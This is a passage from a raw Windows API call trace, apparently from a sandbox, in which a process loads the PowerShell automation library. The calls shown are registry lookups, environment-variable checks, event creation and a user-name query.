lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.170] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.171] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.172] GetLastError () returned 0xcb [0077.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.186] GetLastError () returned 0xcb [0077.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.186] GetLastError () returned 0xcb [0077.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.186] GetLastError () returned 0xcb [0077.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.186] GetLastError () returned 0xcb [0077.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.220] GetLastError () returned 0xcb [0077.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.220] GetLastError () returned 0xcb [0077.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.220] GetLastError () returned 0xcb [0077.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.221] GetLastError () returned 0xcb [0077.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.221] GetLastError () returned 0xcb [0077.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.221] GetLastError () returned 0xcb [0077.221] VirtualQuery (in: lpAddress=0xacad0, lpBuffer=0xadad0, dwLength=0x1c | out: lpBuffer=0xadad0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.223] GetLastError () returned 0xcb [0077.234] VirtualQuery (in: lpAddress=0xacad0, lpBuffer=0xadad0, dwLength=0x1c | out: lpBuffer=0xadad0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.246] GetLastError () returned 0xcb [0077.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.247] GetLastError () returned 0xcb [0077.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.250] GetLastError () returned 0xcb [0077.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.251] GetLastError () returned 0xcb [0077.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.252] GetLastError () returned 0xcb [0077.253] VirtualQuery (in: lpAddress=0xacad0, lpBuffer=0xadad0, dwLength=0x1c | out: lpBuffer=0xadad0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.256] VirtualQuery (in: lpAddress=0xacad0, lpBuffer=0xadad0, dwLength=0x1c | out: lpBuffer=0xadad0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.329] VirtualQuery (in: lpAddress=0xacad0, lpBuffer=0xadad0, dwLength=0x1c | out: lpBuffer=0xadad0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0077.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.337] GetLastError () returned 0xcb [0077.808] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x557c30 [0077.809] GetLastError () returned 0x0 [0077.810] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x557cb8 [0077.811] GetLastError () returned 0x0 [0077.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae52c | out: phkResult=0xae52c*=0x3e8) returned 0x0 [0077.998] RegQueryValueExW (in: hKey=0x3e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae574, lpData=0x0, lpcbData=0xae570*=0x0 | out: lpType=0xae574*=0x1, lpData=0x0, lpcbData=0xae570*=0x56) returned 0x0 [0077.998] RegQueryValueExW (in: hKey=0x3e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae574, lpData=0x54b630, lpcbData=0xae570*=0x56 | out: lpType=0xae574*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae570*=0x56) returned 0x0 [0077.998] RegCloseKey (hKey=0x3e8) returned 0x0 [0077.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae52c | out: phkResult=0xae52c*=0x3e8) returned 0x0 [0077.999] RegQueryValueExW (in: hKey=0x3e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae574, lpData=0x0, lpcbData=0xae570*=0x0 | out: lpType=0xae574*=0x1, lpData=0x0, lpcbData=0xae570*=0x56) returned 0x0 [0077.999] RegQueryValueExW (in: hKey=0x3e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae574, lpData=0x54b630, lpcbData=0xae570*=0x56 | out: lpType=0xae574*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae570*=0x56) returned 0x0 [0077.999] RegCloseKey (hKey=0x3e8) returned 0x0 [0078.000] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x54b630 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0078.000] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x54b630 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0078.001] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xae480 | out: phkResult=0xae480*=0x420) returned 0x0 [0078.002] RegQueryValueExW (in: hKey=0x420, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xae4c8, lpData=0x0, lpcbData=0xae4c4*=0x0 | out: lpType=0xae4c8*=0x0, lpData=0x0, lpcbData=0xae4c4*=0x0) returned 0x2 [0079.309] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0079.309] GetLastError () returned 0x0 [0079.309] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3bc [0079.309] GetLastError () returned 0x0 [0079.309] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0079.309] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4 [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358 [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328 [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330 [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x35c [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360 [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0079.310] GetLastError () returned 0x0 [0079.310] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368 [0079.310] GetLastError () returned 0x0 [0079.310] SetEvent (hEvent=0x3c4) returned 1 [0079.310] GetLastError () returned 0x0 [0079.311] SetEvent (hEvent=0x398) returned 1 [0079.311] GetLastError () returned 0x0 [0079.311] SetEvent (hEvent=0x3bc) returned 1 [0079.311] GetLastError () returned 0x0 [0079.311] SetEvent (hEvent=0x3c0) returned 1 [0079.311] GetLastError () returned 0x0 [0079.311] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0079.311] GetLastError () returned 0x0 [0079.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xae4b4 | out: phkResult=0xae4b4*=0x370) returned 0x0 [0079.312] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xae4fc, lpData=0x0, lpcbData=0xae4f8*=0x0 | out: lpType=0xae4fc*=0x0, lpData=0x0, lpcbData=0xae4f8*=0x0) returned 0x2 [0079.330] SetEvent (hEvent=0x358) returned 1 [0079.330] GetLastError () returned 0x0 [0079.330] SetEvent (hEvent=0x328) returned 1 [0079.330] GetLastError () returned 0x0 [0079.330] SetEvent (hEvent=0x330) returned 1 [0079.330] GetLastError () returned 0x0 [0079.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.343] GetLastError () returned 0xcb [0079.347] SetEvent (hEvent=0x344) returned 1 [0079.347] GetLastError () returned 0xcb [0079.348] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae590 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae590) returned 0x1 [0079.349] GetLastError () returned 0xcb [0079.349] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae598 | out: lpBuffer="5p5NrGJn0jS 